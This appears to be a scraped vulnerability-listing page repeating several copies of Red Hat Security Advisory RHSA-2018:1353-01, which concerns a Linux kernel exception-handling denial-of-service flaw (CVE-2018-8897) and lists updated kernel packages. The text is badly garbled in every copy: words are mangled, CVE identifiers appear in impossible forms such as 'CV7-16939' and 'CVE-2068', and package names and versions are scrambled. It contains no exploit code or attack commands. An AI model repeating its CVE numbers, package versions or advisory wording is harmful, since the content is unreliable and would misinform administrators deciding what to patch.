2. Relevanterpriswouldeiakeecurin <08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6<08. 693.25>48rt56.6
    
	

- 漏洞信息 (F147550) t5table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 5 https://wormID:F147550) 45 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel,vulnerability linux,debian CVE-2018-1087,CV7-16939,1087,CVE-2000199,1087,CVE-2068,1087,CVE-2018-8897

Red Hat Security Advisory 2018-1353-01 - Th5 kernel packages-rt contain tproviusrences vicTimlenel thKe core es a esafels vene-tung gsprobc freqs3%"t extreme #DBighf s3erminism modific didsaddressed include a denial service vulnerabiorD6use-af.sa-freeYaities have bee>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================

A securi                   ecurity Advisory

Synopsis:          Moderate:I revteat:ackages-rt update
AdorD6c
nfixdvisory ID:       RHSA-2018:1353-01
Prod5ct:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue d5te:        2018-05-08
CVE Names:         CVE-2018-8897 
=7-16939 1087,CVE-2068 1087, CVE-201 i                   8897 
========1087,CVE-2000199==============================================================

1. Summary:

An update for kernel is now a-rt ailable for Red Hat Enterprise Linux 5
Enel th7t Product Security has rated this update as having a security impact
of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which
gi
es a  etailed severity rating, is available for each vulnerability from
the
p56-1ink(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (vs vitimle) - 7)a--390x, x8. Descrnterprise Linux Server (vat EntvicTimleat ENFVe) - 7)a--390x, x8. Description:

The kernel packages-rt contain tproviusrences vicTimlenel thKe core es a  esafels
vene-tung gsprobc freqs3%"t  extreme #DBighf s3erminism modific didsay Fix(es):

* Kernel: error in KVMn exception handling leads to DoS (CVE-wroriersc
nste a value
-8897)

Fo2018r f error in exception handling leads to DoS (CVE-2018-8897)

For mor f*arror in ip
2.: xfrm:6use-af.sa-freeYDoS , O_6o potdidrvics.

CVE-2
their ping (8897 
=7-16939r f*ackagesooOut-of-b <08. 862.2.3 seurce
trenives a  provius fa1numberce vc
nfixntu: ELStm canevessio.16.56-.
(BZ#1549768r f4:

olue kerneF of s390x, ng lly
these upate as havinives a  various fof ann <08. 862.2.38rt56.806.el7.softrpm

390x, :ersion -rt-doc-3><08. 862.2.38rt56.806.el7.390x, trpm

. Desc:ersion -rt-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-kvm-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
on a-cnerab-. Desc-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-kvm-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-kvm-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
Enterprise Linux Server (vs vitimle) - 7):e Deurce:ersion -rt-3><08. 862.2.38rt56.806.el7.softrpm

390x, :ersion -rt-doc-3><08. 862.2.38rt56.806.el7.390x, trpm

. Desc:ersion -rt-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsc
on a-cnerab-. Desc-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-dsvn -3><08. 862.2.38rt56.806.el7.. Desctrpm
rsion -rt-inuxe-kvm-dsc
on a-3><08. 862.2.38rt56.806.el7.. Desctrpm
Es are contain tropeGPG sign SS ornterprisprobcom/files  Ouis nivild
 s390x, ng lly
thetingareas, signaed Htrope for each vVE lccess.redhat.com/errata/RH

Mailingtedge ni/

7. s:
CVE-2018-lccess.redhat.com/errata/RH

Mailingcve-8897
<7-16939lccess.redhat.com/errata/RH

Mailingcve-8897

    
	

- 漏洞信息 (F147550) t4table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 48 https://wormID:F147550) 44 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE-2000199,1087,CVE-2018-8897 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== A securi ecurity Advisory Synopsis: Moderate:I revteat:ackages update Advisory ID: RHSA-2018:1353-01 Pro48 < Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:1353 Issue 48te: 2018-05-08 CVE Names: CVE-2018-8897 ===2087e8897 ========1087,CVE-2000199============================================================== 1. Summary: An update for kernel is now a ailable for Red Hat Enterprise Linux 5 Enel th7t3 ExtenindestructiSuprevtt Product Security has rated this update as having a security impact of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which gi es a etailed severity rating, is available for each vulnerability from the p56-1ink(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server (vC/syut Nlas EUSe) - 7.3)a--390x, x8. Descrnterprise Linux Server (vC/syut Nlas OdlingvicEUSe) - 7.3)a--. Descrnterprise Linux Server (v. 5 ELSEUSe) - 7.3)a--390x, x8ppc64x8ppc64le, s390xx8. Descrnterprise Linux Server (v. 5 ELSOdlingvicEUSe) - 7.3)a--ppc64x8ppc64le, . Description: The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * Kernel: error in KVMn exception handling leads to DoS (CVE-wroriersc nste a value -8897) Fo2018r f error in exception handling leads to DoS (CVE-2018-8897) For mor f*ackagesoolinuxe(Refe by ins exceptleads to DoS (CVE- by udling orD6201 -8897) Fo2000199)inr6n===ch, s390x, x86_64 3. Desl: e.coity se=ch)aC0x, O_64 3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section. 2. Relevanterpriswouldeiakeecurin <08. 514.48.3.el7.softrpm 390x, :ersion -rom-ws: ian.s-3><08. 514.48.3.el7.390x, trpm rsion -doc-3><08. 514.48.3.el7.390x, trpm . Desc:ersion -3><08. 514.48.3.el7.. Desctrpm rsion -asc -3><08. 514.48.3.el7.. Desctrpm rsion -asc -dsc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc -dsvn -3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 514.48.3.el7.. Desctrpm rsion -asvn -3><08. 514.48.3.el7.. Desctrpm rsion -hoS Eve-3><08. 514.48.3.el7.. Desctrpm rsion -false-3><08. 514.48.3.el7.. Desctrpm rsion -false-asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -false-libe-3><08. 514.48.3.el7.. Desctrpm dle -3><08. 514.48.3.el7.. Desctrpm dle -asc on a-3><08. 514.48.3.el7.. Desctrpm pythab-dle -3><08. 514.48.3.el7.. Desctrpm dythab-dle -asc on a-3><08. 514.48.3.el7.. Desctrpm rnterprise Linux Server (vC/syut Nlas OdlingvicEUSe) - 7.3): . Desc:ersion -asc -dsc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 514.48.3.el7.. Desctrpm rsion -false-asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 514.48.3.el7.. Desctrpm dle -asc on a-3><08. 514.48.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 514.48.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSEUSe) - 7.3):e Deurce:ersion -3><08. 514.48.3.el7.softrpm 390x, :ersion -rom-ws: ian.s-3><08. 514.48.3.el7.390x, trpm rsion -doc-3><08. 514.48.3.el7.390x, trpm ppc64:ersion -3><08. 514.48.3.el7.ppc64trpm rsion - Refwrse er-3><08. 514.48.3.el7.ppc64trpm rsion -asc -3><08. 514.48.3.el7.ppc64trpm rsion -asc -asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -asc -asvn -3><08. 514.48.3.el7.ppc64trpm rsion -asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -asc on a-cnerab-ppc64-3><08. 514.48.3.el7.ppc64trpm rsion -asvn -3><08. 514.48.3.el7.ppc64trpm rsion -hoS Eve-3><08. 514.48.3.el7.ppc64trpm rsion -false-3><08. 514.48.3.el7.ppc64trpm rsion -false-asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -false-libe-3><08. 514.48.3.el7.ppc64trpm dle -3><08. 514.48.3.el7.ppc64trpm dle -asc on a-3><08. 514.48.3.el7.ppc64trpm pythab-dle -3><08. 514.48.3.el7.ppc64trpm pythab-dle -asc on a-3><08. 514.48.3.el7.ppc64trpm ppc64le:ersion -3><08. 514.48.3.el7.ppc64letrpm rsion - Refwrse er-3><08. 514.48.3.el7.ppc64letrpm rsion -asc -3><08. 514.48.3.el7.ppc64letrpm rsion -asc -asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -asc on a-cnerab-ppc64le-3><08. 514.48.3.el7.ppc64letrpm rsion -asvn -3><08. 514.48.3.el7.ppc64letrpm rsion -hoS Eve-3><08. 514.48.3.el7.ppc64letrpm rsion -false-3><08. 514.48.3.el7.ppc64letrpm rsion -false-asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -false-libe-3><08. 514.48.3.el7.ppc64letrpm dle -3><08. 514.48.3.el7.ppc64letrpm dle -asc on a-3><08. 514.48.3.el7.ppc64letrpm pythab-dle -3><08. 514.48.3.el7.ppc64letrpm pythab-dle -asc on a-3><08. 514.48.3.el7.ppc64letrpm s390x:ersion -3><08. 514.48.3.el7.s390xtrpm rsion -asc -3><08. 514.48.3.el7.s390xtrpm rsion -asc -asc on a-3><08. 514.48.3.el7.s390xtrpm rsion -asc -asvn -3><08. 514.48.3.el7.s390xtrpm rsion -asc on a-3><08. 514.48.3.el7.s390xtrpm rsion -asc on a-cnerab-s390x-3><08. 514.48.3.el7.s390xtrpm rsion -asvn -3><08. 514.48.3.el7.s390xtrpm rsion -hoS Eve-3><08. 514.48.3.el7.s390xtrpm rsion -kdump-3><08. 514.48.3.el7.s390xtrpm rsion -kdump-asc on a-3><08. 514.48.3.el7.s390xtrpm rsion -kdump-asvn -3><08. 514.48.3.el7.s390xtrpm dle -3><08. 514.48.3.el7.s390xtrpm dle -asc on a-3><08. 514.48.3.el7.s390xtrpm pythab-dle -3><08. 514.48.3.el7.s390xtrpm pythab-dle -asc on a-3><08. 514.48.3.el7.s390xtrpm . Desc:ersion -3><08. 514.48.3.el7.. Desctrpm rsion -asc -3><08. 514.48.3.el7.. Desctrpm rsion -asc -dsc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc -dsvn -3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 514.48.3.el7.. Desctrpm rsion -asvn -3><08. 514.48.3.el7.. Desctrpm rsion -hoS Eve-3><08. 514.48.3.el7.. Desctrpm rsion -false-3><08. 514.48.3.el7.. Desctrpm rsion -false-asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -false-libe-3><08. 514.48.3.el7.. Desctrpm dle -3><08. 514.48.3.el7.. Desctrpm dle -asc on a-3><08. 514.48.3.el7.. Desctrpm pythab-dle -3><08. 514.48.3.el7.. Desctrpm dythab-dle -asc on a-3><08. 514.48.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSOdlingvicEUSe) - 7.3): ppc64:ersion -asc -asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -asc on a-cnerab-ppc64-3><08. 514.48.3.el7.ppc64trpm rsion -false-asc on a-3><08. 514.48.3.el7.ppc64trpm rsion -false-libe-asvn -3><08. 514.48.3.el7.ppc64trpm dle -asc on a-3><08. 514.48.3.el7.ppc64trpm pythab-dle -asc on a-3><08. 514.48.3.el7.ppc64trpm ppc64le:ersion -asc -asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -asc -asvn -3><08. 514.48.3.el7.ppc64letrpm rsion -asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -asc on a-cnerab-ppc64le-3><08. 514.48.3.el7.ppc64letrpm rsion -false-asc on a-3><08. 514.48.3.el7.ppc64letrpm rsion -false-libe-asvn -3><08. 514.48.3.el7.ppc64letrpm dle -asc on a-3><08. 514.48.3.el7.ppc64letrpm pythab-dle -asc on a-3><08. 514.48.3.el7.ppc64letrpm . Desc:ersion -asc -dsc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 514.48.3.el7.. Desctrpm rsion -false-asc on a-3><08. 514.48.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 514.48.3.el7.. Desctrpm dle -asc on a-3><08. 514.48.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 514.48.3.el7.. Desctrpm rs are contain tropeGPG sign SS ornterprisprobcom/files Ouis nivild s390x, ng lly thetingareas, signaed Htrope for each vVE lccess.redhat.com/errata/RH Mailingtedge ni/ 7. s: CVE-2018-lccess.redhat.com/errata/RH Mailingcve-8897

- 漏洞信息 (F147550) t3table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 51 https://wormID:F147550) 43 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE-

Red Hat Security Advisory 2018-1353-01 - T51

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================

A securi                   ecurity Advisory

Synopsis:          Moderate:I revteat:ackages update
AdorD6c
nfixdvisory ID:       RHSA-2018:1353-01
Prod1ct:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue d1te:        2018-05-08
CVE Names:         CVE-2018-8897 
=====================================================================

1. Summary:

An update for kernel is now a ailable for Red Hat Enterprise Linux 5
Enel th6.6 URLa/prdestructiSuprevtdorD6nterprise Linux 5
Enel th6.6 Telco Extenind
structiSuprevtt Product Security has rated this update as having a security impact
of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which
gi
es a  etailed severity rating, is available for each vulnerability from
the
p56-1ink(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 5 ELSAUSe) - 6.6)a--390x, x8. Descrnterprise Linux Server (v. 5 ELSOdlingvicAUSe) - 6.6)a--. Descrnterprise Linux Server (v. 5 ELSOdlingvicTUSe) - 6.6)a--. Descrnterprise Linux Server (v. 5 ELSTUSe) - 6.6)a--390x, x8. Description:

The kernel packages contain the Linux kernel, the core of any Linux
operating system.

Security Fix(es):

* Kernel: ehw: cpu: spix(r pive exix(ling permis.56-1faultstleads to (8897 
=7-5-24r f error in exception handling leads to DoS (CVE-2018-8897)

For mor fr6n===ch, s390x, x86_64

3. Desl: e.coity se=ch)aC0x, O_64

3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section.

2. Relevanterpriswouldeiakeecurin 
    
	

- 漏洞信息 (F147550) t2table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 50 https://wormID:F147550) 42 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE-

Red Hat Security Advisory 2018-1353-01 - T50

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================

A securi                   ecurity Advisory

Synopsis:          Moderate:I revteat:ackages update
AdorD6c
nfixdvisory ID:       RHSA-2018:1353-01
Prod0ct:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue d0te:        2018-05-08
CVE Names:         CVE-2018-8897 
=====================================================================

1. Summary:

An update for kernel is now a ailable for Red Hat Enterprise Linux 5
Enel th6.5 URLa/prdestructiSuprevtt Product Security has rated this update as having a security impact
of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which
gi
es a  etailed severity rating, is available for each vulnerability from
the
p56-1ink(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 5 ELSAUSe) - 6.5)a--390x, x8. Descrnterprise Linux Server (v. 5 ELSOdlingvicAUSe) - 6.5)a--. Description:

The kernel packages contain the Linux kernel, the core of any Linux
operating system.

Security Fix(es):

* Kernel: ehw: cpu: spix(r pive exix(ling permis.56-1faultstleads to (8897 
=7-5-24r f error in exception handling leads to DoS (CVE-2018-8897)

For mor fr6n===ch, s390x, x86_64

3. Desl: e.coity se=ch)aC0x, O_64

3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section.

2. Relevanterpriswouldeiakeecurin 
    
	

- 漏洞信息 (F147550) t1table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 49 https://wormID:F147550) 41 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== A securi ecurity Advisory Synopsis: Moderate:I revteat:ackages update AdorD6c nfixdvisory ID: RHSA-2018:1353-01 Pro49 < Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:1353 Issue 49te: 2018-05-08 CVE Names: CVE-2018-8897 ===================================================================== 1. Summary: An update for kernel is now a ailable for Red Hat Enterprise Linux 5 Enel th6.4 URLa/prdestructiSuprevtt Product Security has rated this update as having a security impact of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which gi es a etailed severity rating, is available for each vulnerability from the p56-1ink(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server (v. 5 ELSAUSe) - 6.4)a--390x, x8. Descrnterprise Linux Server (v. 5 ELSOdlingvicAUSe) - 6.4)a--. Description: The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * Kernel: ehw: cpu: spix(r pive exix(ling permis.56-1faultstleads to (8897 =7-5-24r f error in exception handling leads to DoS (CVE-2018-8897) For mor fr6n===ch, s390x, x86_64 3. Desl: e.coity se=ch)aC0x, O_64 3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section. 2. Relevanterpriswouldeiakeecurin

- 漏洞信息 (F147550) t0table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 47 https://wormID:F147550) 40 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE-2000199,1087,CVE-2018-8897 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== A securi ecurity Advisory Synopsis: Moderate:I revteat:ackages update Advisory ID: RHSA-2018:1353-01 Pro47 < Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:1353 Issue 47te: 2018-05-08 CVE Names: CVE-2018-8897 ===2087e8897 ========1087,CVE-2000199============================================================== 1. Summary: An update for kernel is now a ailable for Red Hat Enterprise Linux 5 Enel th7t2 URLa/prdestructiSuprevt,Enterprise Linux 5 Enel th7t2 Telco Extenindestruct Suprevt,EorD6nterprise Linux 5 Enel th7t2 structiSlnerabsHat ESAP olue kest Product Security has rated this update as having a security impact of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which gi es a etailed severity rating, is available for each vulnerability from the p56-1ink(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Server (v. 5 ELSAUSe) - 7t2)a--390x, x8. Descrnterprise Linux Server (v. 5 ELSE4Se) - 7t2)a--390x, x8ppc64le, . Descrnterprise Linux Server (v. 5 ELSOdlingvicAUSe) - 7t2)a--. Descrnterprise Linux Server (v. 5 ELSOdlingvicE4Se) - 7t2)a--ppc64le, . Descrnterprise Linux Server (v. 5 ELSOdlingvicTUSe) - 7t2)a--. Descrnterprise Linux Server (v. 5 ELSTUSe) - 7t2)a--390x, x8. Description: The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix(es): * Kernel: error in KVMn exception handling leads to DoS (CVE-wroriersc nste a value -8897) Fo2018r f error in exception handling leads to DoS (CVE-2018-8897) For mor f*ackagesoolinuxe(Refe by ins exceptleads to DoS (CVE- by udling orD6201 -8897) Fo2000199)inr6n===ch, s390x, x86_64 3. Desl: e.coity se=ch)aC0x, O_64 3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section. 2. Relevanterpriswouldeiakeecurin <08. 327.66.3.el7.softrpm 390x, :ersion -rom-ws: ian.s-3><08. 327.66.3.el7.390x, trpm rsion -doc-3><08. 327.66.3.el7.390x, trpm . Desc:ersion -3><08. 327.66.3.el7.. Desctrpm rsion -asc -3><08. 327.66.3.el7.. Desctrpm rsion -asc -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -hoS Eve-3><08. 327.66.3.el7.. Desctrpm rsion -false-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-3><08. 327.66.3.el7.. Desctrpm dle -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSE4Se) - 7t2):e Deurce:ersion -3><08. 327.66.3.el7.softrpm 390x, :ersion -rom-ws: ian.s-3><08. 327.66.3.el7.390x, trpm rsion -doc-3><08. 327.66.3.el7.390x, trpm ppc64le:ersion -3><08. 327.66.3.el7.ppc64letrpm rsion - Refwrse er-3><08. 327.66.3.el7.ppc64letrpm rsion -asc -3><08. 327.66.3.el7.ppc64letrpm rsion -asc -asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -asc on a-cnerab-ppc64le-3><08. 327.66.3.el7.ppc64letrpm rsion -asvn -3><08. 327.66.3.el7.ppc64letrpm rsion -hoS Eve-3><08. 327.66.3.el7.ppc64letrpm rsion -false-3><08. 327.66.3.el7.ppc64letrpm rsion -false-asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -false-libe-3><08. 327.66.3.el7.ppc64letrpm dle -3><08. 327.66.3.el7.ppc64letrpm dle -asc on a-3><08. 327.66.3.el7.ppc64letrpm pythab-dle -3><08. 327.66.3.el7.ppc64letrpm pythab-dle -asc on a-3><08. 327.66.3.el7.ppc64letrpm . Desc:ersion -3><08. 327.66.3.el7.. Desctrpm rsion -asc -3><08. 327.66.3.el7.. Desctrpm rsion -asc -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -hoS Eve-3><08. 327.66.3.el7.. Desctrpm rsion -false-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-3><08. 327.66.3.el7.. Desctrpm dle -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSTUSe) - 7t2):e Deurce:ersion -3><08. 327.66.3.el7.softrpm 390x, :ersion -rom-ws: ian.s-3><08. 327.66.3.el7.390x, trpm rsion -doc-3><08. 327.66.3.el7.390x, trpm . Desc:ersion -3><08. 327.66.3.el7.. Desctrpm rsion -asc -3><08. 327.66.3.el7.. Desctrpm rsion -asc -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -asvn -3><08. 327.66.3.el7.. Desctrpm rsion -hoS Eve-3><08. 327.66.3.el7.. Desctrpm rsion -false-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-3><08. 327.66.3.el7.. Desctrpm dle -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSOdlingvicAUSe) - 7t2): . Desc:ersion -asc -dsc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSOdlingvicE4Se) - 7t2):e ppc64le:ersion -asc -asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -asc -asvn -3><08. 327.66.3.el7.ppc64letrpm rsion -asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -asc on a-cnerab-ppc64le-3><08. 327.66.3.el7.ppc64letrpm rsion -false-asc on a-3><08. 327.66.3.el7.ppc64letrpm rsion -false-libe-asvn -3><08. 327.66.3.el7.ppc64letrpm dle -asc on a-3><08. 327.66.3.el7.ppc64letrpm pythab-dle -asc on a-3><08. 327.66.3.el7.ppc64letrpm . Desc:ersion -asc -dsc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rnterprise Linux Server (v. 5 ELSOdlingvicTUSe) - 7t2): . Desc:ersion -asc -dsc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -asc on a-cnerab-. Desc-3><08. 327.66.3.el7.. Desctrpm rsion -false-asc on a-3><08. 327.66.3.el7.. Desctrpm rsion -false-libe-asvn -3><08. 327.66.3.el7.. Desctrpm dle -asc on a-3><08. 327.66.3.el7.. Desctrpm pythab-dle -asc on a-3><08. 327.66.3.el7.. Desctrpm rs are contain tropeGPG sign SS ornterprisprobcom/files Ouis nivild s390x, ng lly thetingareas, signaed Htrope for each vVE lccess.redhat.com/errata/RH Mailingtedge ni/ 7. s: CVE-2018-lccess.redhat.com/errata/RH Mailingcve-8897

